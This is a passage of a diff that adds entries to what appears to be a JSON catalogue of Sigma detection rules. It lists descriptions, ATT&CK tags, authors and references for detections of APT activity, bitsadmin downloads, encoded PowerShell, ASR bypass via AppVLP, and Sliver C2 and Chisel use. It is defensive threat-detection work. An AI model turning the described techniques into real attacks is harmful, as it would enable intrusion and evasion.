"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unc2452_cmds.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2021/01/22", + "filename": "proc_creation_win_apt_unc2452_cmds.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports", + "uuid": "b7155193-8a81-4d8f-805d-88de864ca50c", + "value": "UNC2452 PowerShell Pattern", + "meta": { + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", + "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unc2452_ps.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.t1047" + ], + "creation_date": "2021/01/20", + "filename": "proc_creation_win_apt_unc2452_ps.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "A sigma rule detecting an unidetefied attacker who used phishing emails to target high profile orgs on November 2018. 
The Actor shares some TTPs with YYTRIUM/APT29 campaign in 2016.", + "uuid": "7453575c-a747-40b9-839b-125a0aae324b", + "value": "Unidentified Attacker November 2018", + "meta": { + "refs": [ + "https://twitter.com/DrunkBinary/status/1063075530180886529", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unidentified_nov_18.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218.011" + ], + "creation_date": "2018/11/20", + "filename": "proc_creation_win_apt_unidentified_nov_18.yml", + "author": "@41thexplorer, Microsoft Defender ATP", + "level": "high", + "falsepositive": "No established falsepositives", + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", + "uuid": "3121461b-5aa0-4a41-b910-66d25524edbb", + "value": "Winnti Malware HK University Campaign", + "meta": { + "refs": [ + "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_winnti_mal_hk_jan20.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002", + "attack.g0044" + ], + "creation_date": "2020/02/01", + "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml", + "author": "Florian Roth, Markus Neis", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", + "uuid": "73d70463-75c9-4258-92c6-17500fe972f2", + "value": "Winnti Pipemon Characteristics", + "meta": { + "refs": [ + "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_winnti_pipemon.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002", + "attack.g0044" + ], + "creation_date": "2020/07/30", + "filename": "proc_creation_win_apt_winnti_pipemon.yml", + "author": "Florian Roth, oscd.community", + "level": "critical", + "falsepositive": [ + "Legitimate setups that use similar flags" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects activity mentioned in Operation Wocao report", + "uuid": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", + "value": "Operation Wocao Activity", + "meta": { + "refs": [ + "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/", + "https://twitter.com/SBousseaden/status/1207671369963646976", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_wocao.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012", + "attack.defense_evasion", + "attack.t1036.004", + "attack.t1027", + "attack.execution", + "attack.t1053.005", + "attack.t1059.001" + ], + "creation_date": "2019/12/20", + "filename": "proc_creation_win_apt_wocao.yml", + "author": "Florian Roth, frack113", + "level": "high", + "falsepositive": [ + "Administrators that use checkadmin.exe tool to enumerate local administrators" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a ZxShell start by the called and well-known function name", + "uuid": "f0b70adb-0075-43b0-9745-e82a1c608fcc", + "value": "ZxShell Malware", + "meta": { + "refs": [ + "https://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_zxshell.yml" + ], + "tags": [ + 
"attack.execution", + "attack.t1059.003", + "attack.defense_evasion", + "attack.t1218.011", + "attack.s0412", + "attack.g0001" + ], + "creation_date": "2017/07/20", + "filename": "proc_creation_win_apt_zxshell.yml", + "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create \"shortcuts\" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.", + "uuid": "24de4f3b-804c-4165-b442-5a06a2302c7e", + "value": "Arbitrary Shell Command Execution Via Settingcontent-Ms", + "meta": { + "refs": [ + "https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_arbitrary_shell_execution_via_settingcontent.yml" + ], + "tags": [ + "attack.t1204", + "attack.t1566.001", + "attack.execution", + "attack.initial_access" + ], + "creation_date": "2020/03/13", + "filename": "proc_creation_win_arbitrary_shell_execution_via_settingcontent.yml", + "author": "Sreeman", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", + "uuid": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "value": "Phishing Pattern ISO in Archive", + "meta": { + "refs": [ + "https://twitter.com/1ZRR4H/status/1534259727059787783", + "https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_archiver_iso_phishing.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566" + ], + "creation_date": "2022/06/07", + "filename": "proc_creation_win_archiver_iso_phishing.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Application Virtualization Utility is included with Microsoft Office. We are able to abuse \"AppVLP\" to execute shell commands.\nNormally, this binary is used for Application Virtualization, but we can use it as an abuse binary to circumvent the ASR file path rule folder\nor to mark a file as a system file.\n", + "uuid": "9c7e131a-0f2c-4ae0-9d43-b04f4e266d43", + "value": "Using AppVLP To Circumvent ASR File Path Rule", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_asr_bypass_via_appvlp_re.yml" + ], + "tags": [ + "attack.t1218", + "attack.defense_evasion", + "attack.execution" + ], + "creation_date": "2020/03/13", + "filename": "proc_creation_win_asr_bypass_via_appvlp_re.yml", + "author": "Sreeman", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", + "uuid": "245f92e3-c4da-45f1-9070-bc552e06db11", + "value": "Atlassian Confluence CVE-2021-26084", + "meta": { + "refs": [ + "https://nvd.nist.gov/vuln/detail/CVE-2021-26084", + "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html", + 
"https://github.com/h3v0x/CVE-2021-26084_Confluence", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_atlassian_confluence_cve_2021_26084_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.execution", + "attack.t1190", + "attack.t1059" + ], + "creation_date": "2021/09/08", + "filename": "proc_creation_win_atlassian_confluence_cve_2021_26084_exploit.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of attrib.exe to hide files from users.", + "uuid": "4281cb20-2994-4580-aa63-c8b86d019934", + "value": "Hiding Files with Attrib.exe", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_hiding_files.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_attrib_hiding_files.yml", + "author": "Sami Ruohonen", + "level": "low", + "falsepositive": [ + "IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)", + "Msiexec.exe hiding desktop.ini" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Marks a file as a system file using the attrib.exe utility", + "uuid": "bb19e94c-59ae-4c15-8c12-c563d23fe52b", + "value": "Set Windows System File with Attrib", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/attrib", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ], + "creation_date": "2022/02/04", + "filename": "proc_creation_win_attrib_system.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of attrib with \"+s\" option to set suspicious script or executable as system files to hide them from users and make them unable to delete with simple rights. The rule limit the search to specific extensions and directories to avoid FP's", + "uuid": "efec536f-72e8-4656-8960-5e85d091345b", + "value": "Set Suspicious Files as System Files Using Attrib", + "meta": { + "refs": [ + "https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4", + "https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ], + "creation_date": "2022/06/28", + "filename": "proc_creation_win_attrib_system_susp_paths.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "uuid": "f576a613-2392-4067-9d1a-9345fb58d8d1", + "value": "Automated Collection Command Prompt", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_automated_collection.yml" + ], + "tags": [ + "attack.collection", + "attack.t1119", + "attack.credential_access", + "attack.t1552.001" + ], + "creation_date": "2021/07/28", + "filename": "proc_creation_win_automated_collection.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects attackers using tooling with bad opsec defaults e.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run, one trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.", + "uuid": "a7c3d773-caef-227e-a7e7-c2f13c622329", + "value": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", + "meta": { + "refs": [ + "https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/", + "https://www.cobaltstrike.com/help-opsec", + "https://twitter.com/CyberRaiju/status/1251492025678983169", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32", + "https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool", + "https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bad_opsec_sacrificial_processes.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ], + "creation_date": "2020/10/23", + "filename": "proc_creation_win_bad_opsec_sacrificial_processes.yml", + 
"author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects base64 encoded powershell cmdlet invocation of known suspicious cmdlets", + "uuid": "fd6e2919-3936-40c9-99db-0aa922c356f7", + "value": "Malicious Base64 Encoded Powershell Invoke Cmdlets", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_base64_invoke_susp_cmdlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ], + "creation_date": "2022/05/31", + "filename": "proc_creation_win_base64_invoke_susp_cmdlets.yml", + "author": "pH-T", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects base64 encoded listing Win32_Shadowcopy", + "uuid": "47688f1b-9f51-4656-b013-3cc49a166a36", + "value": "Base64 Encoded Listing of Shadowcopy", + "meta": { + "refs": [ + "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_base64_listing_shadowcopy.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ], + "creation_date": "2022/03/01", + "filename": "proc_creation_win_base64_listing_shadowcopy.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects base64 encoded .NET reflective loading of Assembly", + "uuid": 
"62b7ccc9-23b4-471e-aa15-6da3663c4d59", + "value": "Base64 Encoded Reflective Assembly Load", + "meta": { + "refs": [ + "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", + "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_base64_reflective_assembly_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027", + "attack.t1620" + ], + "creation_date": "2022/03/01", + "filename": "proc_creation_win_base64_reflective_assembly_load.yml", + "author": "Christian Burkard, pH-T", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of bitsadmin downloading a file", + "uuid": "d059842b-6b9d-4ed1-b5c3-5b89143c6ede", + "value": "Bitsadmin Download", + "meta": { + "refs": [ + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://isc.sans.edu/diary/22264", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" + ], + "creation_date": "2017/03/09", + "filename": "proc_creation_win_bitsadmin_download.yml", + "author": "Michael Haag, FPT.EagleEye", + "level": "medium", + "falsepositive": [ + "Some legitimate apps use this, but limited." 
+ ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", + "uuid": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", + "value": "Bitsadmin Download from Suspicious Domain", + "meta": { + "refs": [ + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://isc.sans.edu/diary/22264", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_domain.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" + ], + "creation_date": "2022/06/28", + "filename": "proc_creation_win_bitsadmin_download_susp_domain.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Some legitimate apps use this, but limited." 
+ ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", + "uuid": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", + "value": "Bitsadmin Download File with Suspicious Extension", + "meta": { + "refs": [ + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://isc.sans.edu/diary/22264", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ext.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" + ], + "creation_date": "2022/06/28", + "filename": "proc_creation_win_bitsadmin_download_susp_ext.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", + "uuid": "99c840f2-2012-46fd-9141-c761987550ef", + "value": "Bitsadmin Download File from IP", + "meta": { + "refs": [ + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://isc.sans.edu/diary/22264", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" + ], + "creation_date": "2022/06/28", + "filename": "proc_creation_win_bitsadmin_download_susp_ip.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of 
bitsadmin downloading a file to a suspicious target folder", + "uuid": "2ddef153-167b-4e89-86b6-757a9e65dcac", + "value": "Bitsadmin Download to Suspicious Target Folder", + "meta": { + "refs": [ + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://isc.sans.edu/diary/22264", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" + ], + "creation_date": "2022/06/28", + "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of bitsadmin downloading a file to uncommon target folder", + "uuid": "6e30c82f-a9f8-4aab-b79c-7c12bce6f248", + "value": "Bitsadmin Download to Uncommon Target Folder", + "meta": { + "refs": [ + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://isc.sans.edu/diary/22264", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" + ], + "creation_date": "2022/06/28", + "filename": "proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Identifies use of the bcdedit command to delete boot configuration data. 
This tactic is sometimes used as by malware or an attacker as a destructive technique.", + "uuid": "1444443e-6757-43e4-9ea4-c8fc705f79a2", + "value": "Modification of Boot Configuration", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", + "https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bootconf_mod.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ], + "creation_date": "2019/10/24", + "filename": "proc_creation_win_bootconf_mod.yml", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects browsers starting with the remote debugging flags. 
Which is a technique often used to perform browser injection attacks", + "uuid": "b3d34dc5-2efd-4ae3-845f-8ec14921f449", + "value": "Browser Started with Remote Debugging", + "meta": { + "refs": [ + "https://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf", + "https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browser_remote_debugging.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1185" + ], + "creation_date": "2022/07/27", + "filename": "proc_creation_win_browser_remote_debugging.yml", + "author": "pH-T, Nasreddine Bencherchali (update)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects WMI SquiblyTwo Attack with possible renamed WMI by looking for imphash", + "uuid": "8d63dadf-b91b-4187-87b6-34a1114577ea", + "value": "SquiblyTwo Execution", + "meta": { + "refs": [ + "https://subt0x11.blogspot.ch/2018/04/wmicexe-whitelisting-bypass-hacking.html", + "https://twitter.com/mattifestation/status/986280382042595328", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bypass_squiblytwo.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1047", + "attack.t1220", + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_bypass_squiblytwo.yml", + "author": "Markus Neis, Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", + "uuid": "42333b2c-b425-441c-b70e-99404a17170f", + "value": "Sliver C2 Implant Activity Pattern", + "meta": { + "refs": [ + 
"https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36", + "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_c2_sliver.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/08/25", + "filename": "proc_creation_win_c2_sliver.yml", + "author": "Nasreddine Bencherchali, Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", + "uuid": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", + "value": "F-Secure C3 Load by Rundll32", + "meta": { + "refs": [ + "https://github.com/FSecureLABS/C3/blob/11a081fd3be2aaf2a879f6b6e9a96ecdd24966ef/Src/NodeRelayDll/NodeRelayDll.cpp#L12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_c3_load_by_rundll32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ], + "creation_date": "2021/06/02", + "filename": "proc_creation_win_c3_load_by_rundll32.yml", + "author": "Alfie Champion (ajpc500)", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.", + "uuid": "242301bc-f92f-4476-8718-78004a6efd9f", + "value": "Suspicious Load DLL via CertOC.exe", + "meta": { + "refs": [ + "https://twitter.com/sblmsrsn/status/1445758411803480072?s=20", + 
"https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2", + "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2021/10/23", + "filename": "proc_creation_win_certoc_execution.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", + "uuid": "6c6d9280-e6d0-4b9d-80ac-254701b64916", + "value": "NTLM Coercion Via Certutil.exe", + "meta": { + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/issues/243", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/09/01", + "filename": "proc_creation_win_certutil_ntlm_coercion.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. 
Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.", + "uuid": "3d3aa6cd-6272-44d6-8afc-7e88dfef7061", + "value": "Change Default File Association", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.001/T1546.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_change_default_file_association.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.001" + ], + "creation_date": "2019/10/21", + "filename": "proc_creation_win_change_default_file_association.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "low", + "falsepositive": [ + "Admin activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when a program changes the default file association of any extension to an executable", + "uuid": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", + "value": "Change Default File Association To Executable", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/assoc", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_change_default_file_assoc_susp.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.001" + ], + "creation_date": "2022/06/28", + "filename": "proc_creation_win_change_default_file_assoc_susp.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", + "uuid": "8b0e12da-d3c3-49db-bb4f-256703f380e5", + "value": "Chisel Tunneling Tool Usage", + "meta": { + "refs": [ + "https://github.com/jpillora/chisel/", + 
